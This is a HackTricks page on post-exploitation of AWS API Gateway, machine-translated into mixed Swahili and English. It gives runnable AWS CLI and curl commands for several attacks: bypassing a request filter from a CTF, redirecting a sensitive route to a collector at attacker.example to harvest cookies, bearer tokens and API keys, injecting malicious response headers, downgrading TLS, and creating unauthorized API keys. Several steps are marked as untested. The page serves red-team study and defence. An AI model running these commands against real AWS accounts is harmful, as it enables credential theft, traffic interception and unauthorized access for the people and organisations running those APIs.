AWS - API Gateway Post Exploitation

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

• Angalia the subscription plans!
• Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.

API Gateway

Kwa maelezo zaidi angalia:

AWS - API Gateway Enum

Kupata APIs zisizoonyeshwa

Unaweza kuunda endpoint katika https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint kwa service com.amazonaws.us-east-1.execute-api, kufichua endpoint hiyo katika mtandao unaopatikana (inawezekana kupitia mashine ya EC2) na uteue security group inayoruhusu miunganisho yote.
Kisha, kutoka mashine ya EC2 utaweza kufikia endpoint na hivyo kuita gateway API ambayo haikuonyeshwa hapo awali.

Bypass Request body passthrough

Mbinu hii ilipatikana katika this CTF writeup.

Kama ilivyoashiriwa katika AWS documentation katika sehemu ya PassthroughBehavior, kwa default, thamani WHEN_NO_MATCH, wakati inapokagua header ya Content-Type ya ombi, itapitisha ombi kwenda back end bila mabadiliko.

Kwa hivyo, katika CTF API Gateway ilikuwa na integration template ambayo ilikuwa preventing the flag from being exfiltrated katika response wakati ombi lilitumwa na Content-Type: application/json:

RequestTemplates:
application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}'

Hata hivyo, kutuma ombi lenye Content-type: text/json kungezuia kichujio hicho.

Hatimaye, kwa kuwa API Gateway iliruhusu tu Get na Options, ilikuwa inawezekana kutuma query yoyote ya dynamoDB bila kikomo kwa kutuma ombi la POST lenye query ndani ya mwili wa ombi na kwa kutumia header X-HTTP-Method-Override: GET:

curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers -H 'X-HTTP-Method-Override: GET' -H 'Content-Type: text/json'  --data '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename = :moviename","ExpressionAttributeValues":{":moviename":{"S":"hackers"}}}'

Mipango ya Matumizi DoS

Katika sehemu ya Enumeration unaweza kuona jinsi ya kupata mpango wa matumizi wa vifunguo. Ikiwa una key na ime imepunguzwa kwa matumizi X kwa mwezi, unaweza tu kuitumia na kusababisha DoS.

The API Key just need to be kujumuishwa inside a HTTP header called x-api-key.

Swap Route Integration To Exfil Traffic (HTTP APIs / apigatewayv2)

Ikiwa unaweza kusasisha HTTP API integration, unaweza kuielekeza upya route nyeti (mf. /login, /token, /submit) kwenda kwenye endpoint ya HTTP inayodhibitiwa na mshambuliaji na kimya kusanya headers and bodies (cookies, Authorization bearer tokens, session ids, API keys, secrets sent by internal jobs, etc.).

Example workflow:

REGION="us-east-1"
API_ID="<http_api_id>"

# Find routes and the integration attached to the interesting route
aws apigatewayv2 get-routes --region "$REGION" --api-id "$API_ID"
ROUTE_ID="<route_id>"
INTEGRATION_ID="$(aws apigatewayv2 get-route --region "$REGION" --api-id "$API_ID" --route-id "$ROUTE_ID" --query 'Target' --output text | awk -F'/' '{print $2}')"

# Repoint the integration to your collector (HTTP_PROXY / URL integration)
COLLECTOR_URL="https://attacker.example/collect"
aws apigatewayv2 update-integration --region "$REGION" --api-id "$API_ID" --integration-id "$INTEGRATION_ID" --integration-uri "$COLLECTOR_URL"

Notes:

• Kwa HTTP APIs, mabadiliko kwa kawaida hufanyika mara moja (si kama REST APIs ambapo kwa kawaida unahitaji kuunda a deployment).
• Je, unaweza kuelekeza kwa arbitrary URL inategemea integration type/config; katika baadhi ya kesi unaweza pia kuwa na uwezo wa kubadilisha integration type wakati wa patching.

apigateway:UpdateGatewayResponse, apigateway:CreateDeployment

Mshambuliaji akiwa na ruhusa apigateway:UpdateGatewayResponse na apigateway:CreateDeployment anaweza kubadilisha Gateway Response iliyopo ili kujumuisha custom headers au response templates ambazo zinaweza leak taarifa nyeti au kutekeleza malicious scripts.

API_ID="your-api-id"
RESPONSE_TYPE="DEFAULT_4XX"

# Update the Gateway Response
aws apigateway update-gateway-response --rest-api-id $API_ID --response-type $RESPONSE_TYPE --patch-operations op=replace,path=/responseTemplates/application~1json,value="{\"message\":\"$context.error.message\", \"malicious_header\":\"malicious_value\"}"

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Athari Zinazoweza Kutokea: Leakage ya taarifa nyeti, kutekeleza skripti zenye madhara, au ufikiaji usioidhinishwa wa rasilimali za API.

Note

Inahitaji kujaribiwa

apigateway:UpdateStage, apigateway:CreateDeployment

Mshambulizi mwenye ruhusa apigateway:UpdateStage na apigateway:CreateDeployment anaweza kubadilisha stage ya API Gateway iliyopo ili kupeleka trafiki kwa stage tofauti au kubadilisha mipangilio ya caching ili kupata ufikiaji usioidhinishwa wa data zilizohifadhiwa kwenye cache.

API_ID="your-api-id"
STAGE_NAME="Prod"

# Update the API Gateway stage
aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME --patch-operations op=replace,path=/cacheClusterEnabled,value=true,op=replace,path=/cacheClusterSize,value="0.5"

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potential Impact: Ufikiaji usioidhinishwa kwa data iliyohifadhiwa, kukatiza au kunyakua trafiki ya API.

Note

Inahitaji upimaji

apigateway:PutMethodResponse, apigateway:CreateDeployment

Mshambulizi mwenye ruhusa apigateway:PutMethodResponse na apigateway:CreateDeployment anaweza kubadilisha method response ya njia iliyopo ya API Gateway REST API ili kujumuisha custom headers au response templates ambazo zinaweza leak taarifa nyeti au kutekeleza script zenye madhara.

API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
HTTP_METHOD="GET"
STATUS_CODE="200"

# Update the method response
aws apigateway put-method-response --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --status-code $STATUS_CODE --response-parameters "method.response.header.malicious_header=true"

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potential Impact: Leakage ya taarifa nyeti, utekelezaji wa scripts zenye madhumuni mabaya, au upatikanaji usioidhinishwa kwa rasilimali za API.

Note

Inahitaji upimaji

apigateway:UpdateRestApi, apigateway:CreateDeployment

Mshambulizi mwenye ruhusa apigateway:UpdateRestApi na apigateway:CreateDeployment anaweza kubadilisha mipangilio ya API Gateway REST API ili kuzima logging au kubadilisha toleo la chini la TLS, na hivyo kuweza kudhoofisha usalama wa API.

API_ID="your-api-id"

# Update the REST API settings
aws apigateway update-rest-api --rest-api-id $API_ID --patch-operations op=replace,path=/minimumTlsVersion,value='TLS_1.0',op=replace,path=/apiKeySource,value='AUTHORIZER'

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Athari Inayoweza Kutokea: Kupunguza usalama wa API, jambo linaloweza kuruhusu upatikanaji usioidhinishwa au kufichua taarifa nyeti.

Note

Inahitaji majaribio

apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan, apigateway:CreateUsagePlanKey

Mshambuliaji mwenye ruhusa apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan, na apigateway:CreateUsagePlanKey anaweza kuunda API keys mpya, kuziambatisha na usage plans, na kisha kutumia funguo hizi kupata upatikanaji usioidhinishwa kwa APIs.

# Create a new API key
API_KEY=$(aws apigateway create-api-key --enabled --output text --query 'id')

# Create a new usage plan
USAGE_PLAN=$(aws apigateway create-usage-plan --name "MaliciousUsagePlan" --output text --query 'id')

# Associate the API key with the usage plan
aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_KEY --key-type API_KEY

Potential Impact: Upatikanaji usioidhinishwa kwa rasilimali za API, kukwepa udhibiti wa usalama.

Note

Inahitaji upimaji

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

• Angalia the subscription plans!
• Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.